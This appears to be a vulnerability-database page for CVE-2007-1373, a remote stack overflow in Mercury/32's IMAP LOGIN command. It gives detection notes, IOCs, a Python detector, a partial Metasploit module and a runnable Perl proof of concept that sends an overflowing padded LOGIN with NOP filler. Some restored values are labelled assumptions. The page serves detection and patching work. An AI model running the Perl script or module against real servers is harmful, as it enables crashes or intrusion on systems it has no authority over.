CVE-2007-1373
Published: 2007-03-10
Priority: P2 (62) · CVSS 2.0 base score: 10 (critical)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploits available (Exploit-DB and Metasploit entries below)
EPSS: 58.69% (99.0th percentile)
Stack-based buffer overflow in Mercury/32 (aka Mercury Mail Transport System) 4.01b and earlier allows remote attackers to execute arbitrary code via a long LOGIN command. NOTE: this might be the same issue as CVE-2006-5961.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmail | mercury_mail_transport_system | <= 4.01b | — |
Detection & IOCs (extracted from the exploit sources)

Byte sequences (4-byte little-endian values taken from the exploit sources, consistent with the hardcoded per-OS return addresses the C PoC carries; they identify that specific PoC, not the vulnerability):
- `\xCC\x59\xFB\x77`
- `\xED\x1E\x94\x7C`
- `\x23\xde\xaf\x01`
- `\xAB\x8B\xFB\x77`
- `\x6A\xFA\xE8\x77`

Detection notes:
- Oversized IMAP LOGIN command: the Metasploit module sends `A001 LOGIN` padded with 1008 spaces, followed by a literal size specifier and a literal continuation block. Flag LOGIN commands on TCP/143 to a Mercury/32 host whose verb is followed by hundreds of spaces and ends in a `{N}` literal.
- Banner match: the IMAP greeting names the server version; a banner matching `Mercury/32 v4.01a` or `v4.01b` identifies a vulnerable host (the Metasploit `check` method uses exactly this test).
- Two-stage literal send: a LOGIN line carrying a literal size specifier, then a follow-up payload block. The network pattern is a multi-packet LOGIN sequence on port 143 with an abnormally large literal size.
- The C PoC's total exploit buffer is roughly 625 bytes. Treat that as an approximate size rather than an exact-match signature: the Metasploit version is already larger from its 1008-space padding alone.
- Bad characters: the Metasploit module excludes 0x00, 0x0a, 0x0d and 0x20 (NUL, LF, CR, space) from its payload, and the C exploit lists 0x20 and 0x0a. Encoded shellcode in the traffic will therefore contain none of those bytes; this is a property of the encoder, not a signature by itself.
- Post-exploitation: the sources describe a shell connection on port 4444. Monitor outbound TCP connections from the Mercury/32 process, keeping in mind that the port is chosen by the attacker's payload and may differ.
- The Metasploit module sets EXITFUNC to `thread`, so the shellcode runs in its own thread and the main Mercury/32 process may not crash; crash-based detection is unreliable.
- Payload space is limited to 800 bytes with a StackAdjustment of -3500; payloads larger than 800 bytes do not fit this exploit module.
- The C exploit targets only Windows 2000 SP4, Windows XP SP1/SP2 and Windows 2003 SP0/SP1 with hardcoded return addresses; other OS builds need different return addresses and are not covered.
- The vulnerability may be the same issue as CVE-2006-5961; detections and patch tracking should account for both CVE identifiers.
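The notes above describe a network pattern (a LOGIN verb followed by a long run of spaces, a `{N}` literal, then raw continuation data) and a banner test. The following script is an added example, not code from any of the exploit sources or from the Mercury/32 project: it applies those checks to constructed sample traffic. The banner regex is the one from the Metasploit `check` method quoted on this page; the padding and literal-size thresholds, the sample greeting and the sample client writes are assumptions made for the example.

```python
import re

# Version test from the Metasploit module's check() on this page.
BANNER_RE = re.compile(r"Mercury/32 v4\.01[ab]")
# IMAP command line: tag, the LOGIN verb, the run of spaces after it, then the arguments.
LOGIN_RE = re.compile(rb"^(\S+) LOGIN( *)(.*?)\r?\n$", re.IGNORECASE | re.DOTALL)
# RFC 3501 literal size specifier at the end of the line: "{N}" or non-synchronising "{N+}".
LITERAL_RE = re.compile(rb"\{(\d+)\+?\}$")

# Thresholds are assumptions for this example: a normal client sends exactly one
# space after LOGIN, and user-name or password literals are a few dozen bytes.
PAD_THRESHOLD = 32
LITERAL_THRESHOLD = 128
TEXT_BYTES = frozenset(b"\t\r\n") | frozenset(range(0x20, 0x7F))


def banner_is_vulnerable(banner: str) -> bool:
    """True when the IMAP greeting advertises Mercury/32 4.01a or 4.01b."""
    return BANNER_RE.search(banner) is not None


def analyze_login(blocks):
    """Inspect consecutive client->server writes, the first being a LOGIN line.

    Returns the measured padding, the declared literal size, the total byte
    count and the reasons (if any) the sequence matches the overflow pattern.
    """
    result = {"is_login": False, "pad": 0, "literal": None,
              "total_bytes": sum(len(b) for b in blocks), "reasons": []}
    m = LOGIN_RE.match(blocks[0])
    if m is None:
        result["suspicious"] = False
        return result
    result["is_login"] = True
    pad, args = len(m.group(2)), m.group(3)
    result["pad"] = pad
    if pad >= PAD_THRESHOLD:
        result["reasons"].append(f"LOGIN verb padded with {pad} spaces")

    lit = LITERAL_RE.search(args)
    if lit:
        size = int(lit.group(1))
        result["literal"] = size
        if size >= LITERAL_THRESHOLD:
            result["reasons"].append(f"oversized literal {{{size}}}")
        # After the N literal bytes a real client sends the short remainder of
        # the command, ending in CRLF. The PoCs instead push the literal bytes
        # and then a second raw block that never terminates the command.
        data = b"".join(blocks[1:])
        trailing = data[size:]
        if trailing and b"\n" not in trailing:
            result["reasons"].append(
                f"{len(trailing)} raw bytes after the {size}-byte literal with no command terminator")
        # The command stream is 7-bit text; NOP sleds and encoded shellcode are not.
        binary = sum(1 for b in data if b not in TEXT_BYTES)
        if binary > 16:
            result["reasons"].append(f"{binary} non-text bytes in the login continuation")

    result["suspicious"] = bool(result["reasons"])
    return result


# Constructed sample traffic (not captured from a real Mercury/32 host).
BENIGN = [b"A001 LOGIN {5}\r\n", b"alice {6}\r\n", b"secret\r\n"]
# Shape of the Perl PoC: "1 LOGIN", a long run of spaces, a {255} literal,
# then 255 filler bytes and a second block of filler.
ATTACK = [b"1 LOGIN" + b" " * 1008 + b"{255}\n", b"\x90" * 255, b"\x90" * 600]

if __name__ == "__main__":
    print(banner_is_vulnerable("* OK Mercury/32 v4.01b IMAP4rev1 server ready"))
    for name, blocks in (("benign", BENIGN), ("attack", ATTACK)):
        r = analyze_login(blocks)
        print(name, r["suspicious"], r["pad"], r["literal"], r["total_bytes"], r["reasons"])
```

The padding check alone is enough to catch the Metasploit module's 1008-space LOGIN; the literal checks are what distinguish the two-stage send from a legitimate client that logs in with a `{N}` literal, which is why the benign sample uses one.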
No detection rules found.
Exploit-DB
Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit)
exploitdb · 2010-06-22 · CVE-2007-1373

The extracted copy of the module was cut at the header and at the end of `check`; the excerpt is shown here restored to the standard module shape (the description text is the one given in the Metasploit listing below, and the `exploit` method was not part of the excerpt).

```ruby
##
# Exploit-DB copy of the Metasploit module ($Revision: 9583 $).
# Header and the tail of check() restored; the exploit method is not in the excerpt.
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mercury/32 <= 4.01b LOGIN Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Mercury/32 <= 4.01b
          IMAPD LOGIN verb. By sending a specially crafted login command, a
          buffer is corrupted, and code execution is possible. This vulnerability
          was discovered by (mu-b at digit-labs.org).
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9583 $',
      'References'     =>
        [
          [ 'CVE', '2007-1373' ],
          [ 'OSVDB', '33883' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',   # shellcode runs in its own thread; the service may survive
        },
      'Payload'        =>
        {
          'Space'           => 800,
          'BadChars'        => "\x00\x0a\x0d\x20",   # NUL, LF, CR, space
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Hardcoded per-OS return addresses
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],
          [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
        ],
      'DisclosureDate' => 'Mar 6 2007',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(143)
      ], self.class)
  end

  # Banner check: the IMAP greeting names the server version.
  def check
    connect
    resp = sock.get_once
    disconnect

    if (resp =~ /Mercury\/32 v4\.01[a-b]/)
      return Exploit::CheckCode::Vuln
    end

    return Exploit::CheckCode::Safe
  end

  # exploit method not included in the extracted excerpt
end
```
Exploit-DB
Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)
exploitdb · 2007-03-06 · CVE-2007-1373

Only the send sequence and the helper subs of `mercurypown-v1.pl` survived extraction. The excerpt is shown here made runnable: the module imports, option parsing and the values of `$LEN`, `$BUFLEN`, `$NOP` and `$send_delay` were cut and are restored as labelled assumptions.

```perl
#!/usr/bin/perl
#
# mercurypown-v1.pl
#
# Mercury/32 4.01b IMAP LOGIN buffer overflow PoC (mu-b, digit-labs.org).
# Imports, option parsing and the parameter values below were not in the
# extracted excerpt and are assumptions added to make it run.
#
use strict;
use warnings;
use Socket;
use Getopt::Std;

my $LEN        = 1024;    # assumed: total length of the LOGIN line
my $BUFLEN     = 255;     # assumed: size of the second filler block
my $NOP        = "\x90";  # assumed: filler byte (x86 NOP)
my $send_delay = 1;       # assumed: seconds between sends
my $port       = 143;     # IMAP

print_header();
my %opts;
getopts('t:', \%opts);
usage() unless defined($opts{t});

connect_host($opts{t}, $port);
print("-> * Connected\n");
# Stage 1: LOGIN verb padded with spaces, terminated by a literal size specifier
my $buf = "1 LOGIN".(" "x($LEN-$BUFLEN))."\{255\}\n";
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Sending payload\n");
# Stage 2: the 255 literal bytes the server now expects
$buf = $NOP x 255;
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Sending payload 2\n");
# Stage 3: the follow-up raw block sent after the literal
$buf = $NOP x $BUFLEN;
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Successfully sent payload!\n");
close(SOCKET);

sub print_header {
	print("Mercury/32 4.01b IMAP LOGIN buffer overflow PoC\n\n");
}
sub usage {
	print(qq(Usage: $0 -t <host>
	-t : hostname to test
));
	exit(1);
}
sub connect_host {
	my ($target, $port) = @_;
	my $iaddr = inet_aton($target) || die("Error: $!\n");
	my $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
	my $proto = getprotobyname('tcp') || die("Error: $!\n");
	socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
	connect(SOCKET, $paddr) || die("Error: $!\n");
}
```
Exploit-DB
Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
exploitdb · 2005-09-20 · CVE-2007-1373

Only the header comment of the C exploit was extracted; the exploit body is not part of the excerpt. Note that this 2005 exploit names 4.01a as affected and 4.01b as the fix, whereas the CVE covers 4.01b and earlier (see the NOTE on CVE-2006-5961 above).

```c
/*
Mercury imap4 server remote buffer overflow exploit
author : c0d3r "kaveh razavi"
package : Mercury mail transport system 4.01a and probably prior
workaround : upgrade to 4.01b version
advisory : not available right now
company address : www.pmail.com
timeline :
15 Sep 2005 : vulnerability reported by securiteam mailing list
20 Sep 2005 : IHS exploit released
exploit features :
1) 5 working targets including win2k , winxp , win2k3
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars are : 0x20 0x0a
compiled with visual c++ 6 : cl mercury_imap.c
greeting to :
www.ihsteam.com the team , LorD and NT heya
www.ihsteam.net english version ,
www.exploitdev.com Jamie and Ben the two
(header comment ends here in the excerpt; the exploit body was not extracted)
*/
```
Metasploit
Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).

References:
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/052802.html
- http://osvdb.org/33883
- http://secunia.com/advisories/24367
- http://securityreason.com/securityalert/2398
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32848

Published: 2007-03-10